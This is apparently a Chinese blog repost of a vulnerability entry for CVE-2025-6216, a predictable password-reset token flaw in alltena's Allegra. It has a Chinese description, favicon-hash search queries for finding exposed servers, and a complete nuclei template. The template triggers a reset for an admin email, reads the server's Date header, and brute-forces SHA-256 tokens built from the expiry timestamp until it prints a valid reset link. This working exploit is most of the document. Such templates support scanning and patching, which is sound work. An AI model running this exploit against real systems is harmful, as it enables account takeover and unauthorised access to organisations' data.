Allegra Authentication Bypass via Predictable Password Reset Token

漏洞信息

漏洞名称: Allegra Authentication Bypass via Predictable Password Reset Token

漏洞编号:

  • CVE: CVE-2025-6216

漏洞类型: 权限绕过

漏洞等级: 严重

漏洞描述: Allegra是一款广泛使用的应用程序,主要用于企业级服务中,提供密码恢复等功能。由于其广泛的应用,该漏洞的影响范围较大。此漏洞属于权限绕过类型,具体存在于密码恢复机制中。技术根源在于生成密码重置令牌时依赖于可预测的值,导致攻击者可以预测令牌并绕过身份验证。这种漏洞允许远程攻击者在不需要身份验证的情况下,利用可预测的密码重置令牌绕过身份验证,从而获得对应用程序的未授权访问。攻击者可以利用此漏洞访问敏感数据,破坏系统完整性,甚至可能完全控制受影响的系统。由于漏洞的严重性和易利用性,建议用户立即升级到Allegra版本8.1.4或7.5.2或更高版本,以修复此漏洞。

产品厂商: alltena

产品名称: Allegra

影响版本: *

搜索语法: http.favicon.hash:”284403119” OR icon_hash=”284403119”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/b816cdef49659be2ec324328e32b8fea56bac23f/code%2Fcves%2F2025%2FCVE-2025-6216.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118

id: CVE-2025-6216

info:
  name: Allegra - Authentication Bypass via Predictable Password Reset Token
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    Allegra calculateTokenExpDate Password Recovery Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of Allegra. Authentication is not required to exploit this vulnerability. The specific flaw exists within the password recovery mechanism. The issue results from reliance upon a predictable value when generating a password reset token. An attacker can leverage this vulnerability to bypass authentication on the application.
  impact: |
    An attacker can exploit this vulnerability to bypass authentication and gain unauthorized access to the application, potentially compromising sensitive data and system integrity.
  remediation: |
    Upgrade Allegra to version 8.1.4 or 7.5.2 or later to fix the predictable password reset token vulnerability.
  reference:
    - https://www.zerodayinitiative.com/advisories/ZDI-25-410/
    - https://alltena.com/en/resources/release-notes/release-notes-for-release-8-1-4-and-release-7-5-2
    - https://nvd.nist.gov/vuln/detail/CVE-2025-6216
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-6216
    cwe-id: CWE-640
    cpe: cpe:2.3:a:alltena:allegra:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: alltena
    product: allegra
    shodan-query: http.favicon.hash:"284403119"
    fofa-query: icon_hash="284403119"
  tags: cve,cve2025,allegra,auth-bypass,predictable-token,reset

variables:
  email: "admin@mydomainxxx.com"  # Change to a test account

flow: http(1) && code()

http:
  - raw:
      - |
        POST /resetPassword.action HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        email={{email}}&fromAjax=true&_dc=1750669432104&perspectiveType=&appActionID=

    extractors:
      - type: regex
        name: date_header
        part: header
        internal: true
        group: 1
        regex:
          - "Date: (.*)"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "emailSent"
          - '"success":true'
        condition: and

      - type: status
        status:
          - 200

code:
  - engine:
      - py
      - python3 # requires python to be pre-installed on system running nuclei

    source: |
            import requests
            import hashlib,os
            import time
            from datetime import datetime, timezone
            from email.utils import parsedate_to_datetime

            def get_server_time(response):
                date_header = response.headers.get('Date')
                if date_header:
                    return parsedate_to_datetime(date_header)
                return None

            def main():
                BASE_URL = os.getenv("BaseURL")
                EMAIL = os.getenv("email")
                date_header = os.getenv("date_header")
                server_time = parsedate_to_datetime(date_header)
                if not server_time:
                    return
                server_time_ms = int(server_time.timestamp() * 1000)
                expiry_time_ms = server_time_ms + 28800000
                base_expiry_sec = (expiry_time_ms // 1000) * 1000
                for ms in range(1000):
                    candidate_expiry_ms = base_expiry_sec + ms
                    token = hashlib.sha256(str(candidate_expiry_ms).encode()).hexdigest()
                    test_url = f"{BASE_URL}/resetPassword!confirm.action?ctk={token}"
                    r = requests.get(test_url, allow_redirects=False)
                    if 'com.trackplus.app.logon.ResetPasswordApplication' in r.text:
                        print(test_url)
                        return

            if __name__ == "__main__":
                main()

    matchers:
      - type: dsl
        dsl:
          - contains(code_response, "/resetPassword!confirm.action?ctk=")

    extractors:
      - type: dsl  # type of the extractor
        dsl:
          - '"Reset URL: " + code_response'


Github Poc
#projectdiscovery/nuclei-templates:github issues #权限绕过
Allegra Authentication Bypass via Predictable Password Reset Token
http://example.com/2025/07/14/github_846879621/
作者
lianccc
发布于
2025年7月14日
许可协议